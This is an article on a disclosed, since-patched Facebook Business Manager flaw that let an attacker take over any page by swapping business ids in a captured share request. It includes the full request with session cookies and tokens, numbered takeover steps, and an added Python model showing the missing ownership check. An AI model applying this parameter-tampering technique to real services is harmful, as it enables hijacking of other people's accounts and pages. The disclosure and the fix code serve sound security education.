Indian Security Researcher Arun Sureshkumar Found Facebook Vulnerability To Hack Any Facebook Page.
- He described the proof of concept of the vulnerability in his blog.
- It was a critical vulnerability that allowed an attacker to take over any page with admin permission, which permits critical actions such as page deletion.
- He received a $16,000 bug bounty award from Facebook.
According to OWASP, Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability, attackers can bypass authorization and access resources in the system directly, for example database records or files.
Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system, and more. This is caused by the fact that the application takes user supplied input and uses it to retrieve an object without performing sufficient authorization checks.
1. Two Facebook Business accounts.
One is your own business; the other can be the business of any test account.
Here I use my own business id: 907970555981524
For the other, any partner id will do; I chose one from my test account: 991079870975788
2. Add a partner using my own business and intercept the request.
Now you can see the vulnerable request:
POST /business_share/asset_to_agency/?dpr=2 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Accept-Encoding: gzip, deflate, br
Cookie: rc=2; datr=AWE3V–DUGNTOAy0wTGmpAXb; locale=en_GB; sb=BWE3V1vCnlxJF87yY9a8WWjP; pl=n; lu=gh2GPBnmZY1B1j_7J0Zi3nAA; c_user=100000771680694; xs=25%3A5C6rNSCaCX92MA%3A2%3A1472402327%3A4837; fr=05UM8RW0tTkDVgbSW.AWUB4pn0DvP1fQoqywWeORlj_LE.BXN2EF.IL.FfD.0.0.BXxBSo.AWXdKm2I; csm=2; s=Aa50vjfSfyFHHmC1.BXwxOY; _ga=GA1.2.1773948073.1464668667; p=-2; presence=EDvF3EtimeF1472469215EuserFA21B00771680694A2EstateFDutF1472469215051CEchFDp_5f1B00771680694F7CC; act=1472469233458%2F6
parent_business_id=907970555981524&agency_id=991079870975788&asset_id=536195393199075&role=MANAGER&__user=100000771680694&__a=1&__dyn=aKU-XxaAcoaucCJDzopz8aWKFbGEW8UhrWqw-xG2G4aK2i8zFE8oqCwkoSEvmbgcFV8SmqVUzxeUW4ohAxWdwSDBzovU-eBCy8b48xicx2aGewzwEx2qEN4yECcKbBy9onwFwHCBxungXKdAw&__req=e&__be=-1&__pc=PHASED%3Abrands_pkg&fb_dtsg=AQHoLGh1HUmf%3AAQGT4fDF1-nQ&ttstamp=265817211176711044972851091025865817184521026870494511081&__rev=25307333
3. Change asset_id to the page you want to hack, and also interchange parent_business_id with agency_id.
4. Resend the request.
The request is sent successfully: the page is added to the attacker's Facebook Business Manager with the role Manager.
5. Assign yourself as admin of the page that was added by the exploit.
6. Browse the page on Facebook.
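The root cause above is that the server honoured whatever parent_business_id, agency_id and asset_id the client supplied. The following is an added example, not Facebook's code: it models the share endpoint with and without object-level authorization and replays the swapped ids from step 3 against both. The victim page id and the victim admin's user id are constructed placeholders; the other ids come from the write-up.

```python
# Added example (not Facebook's code): a model of the Business Manager
# asset_to_agency share operation, with the missing ownership check added.
from dataclasses import dataclass, field

ATTACKER_USER = 100000771680694   # __user / c_user in the captured request
ATTACKER_BIZ = 907970555981524    # the researcher's own business id
VICTIM_BIZ = 991079870975788      # the partner (test account) business id
VICTIM_PAGE = 111111111111111     # constructed: a page owned by VICTIM_BIZ
VICTIM_ADMIN = 200000000000001    # constructed: an admin of VICTIM_BIZ

@dataclass
class Business:
    admins: set = field(default_factory=set)    # user ids that administer it
    assets: set = field(default_factory=set)    # page ids it owns
    shared: dict = field(default_factory=dict)  # asset_id -> role received

def make_state():
    """Constructed sample tenancy: each business knows its admins and pages."""
    return {
        ATTACKER_BIZ: Business(admins={ATTACKER_USER}),
        VICTIM_BIZ: Business(admins={VICTIM_ADMIN}, assets={VICTIM_PAGE}),
    }

def share_asset_insecure(state, user, parent_business_id, agency_id, asset_id, role):
    """The behaviour the write-up describes: every id in the POST body is
    trusted, so the caller may name someone else's business as the parent."""
    state[agency_id].shared[asset_id] = role
    return "granted"

def share_asset_secure(state, user, parent_business_id, agency_id, asset_id, role):
    """Same operation with server-side object-level authorization."""
    parent = state.get(parent_business_id)
    agency = state.get(agency_id)
    if parent is None or agency is None:
        return "denied: unknown business"
    if user not in parent.admins:        # caller must administer the giving side
        return "denied: caller does not administer parent_business_id"
    if asset_id not in parent.assets:    # asset must belong to that business
        return "denied: asset_id not owned by parent_business_id"
    agency.shared[asset_id] = role
    return "granted"

def replay_swapped_ids(handler):
    """Sends the step-3 request (parent and agency interchanged, victim page as
    asset) to a handler; returns its verdict and whether the page was shared."""
    state = make_state()
    outcome = handler(state, ATTACKER_USER, parent_business_id=VICTIM_BIZ,
                      agency_id=ATTACKER_BIZ, asset_id=VICTIM_PAGE, role="MANAGER")
    return outcome, VICTIM_PAGE in state[ATTACKER_BIZ].shared
```

The secure handler still grants the legitimate flow, where an admin of the parent business shares a page it owns with a partner.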
Arun reported the issue to the Facebook security team on 29 Aug 2016, and Facebook patched the vulnerability on 6 September. On 16 September, the Facebook security team awarded $16,000 USD as part of its bug bounty program.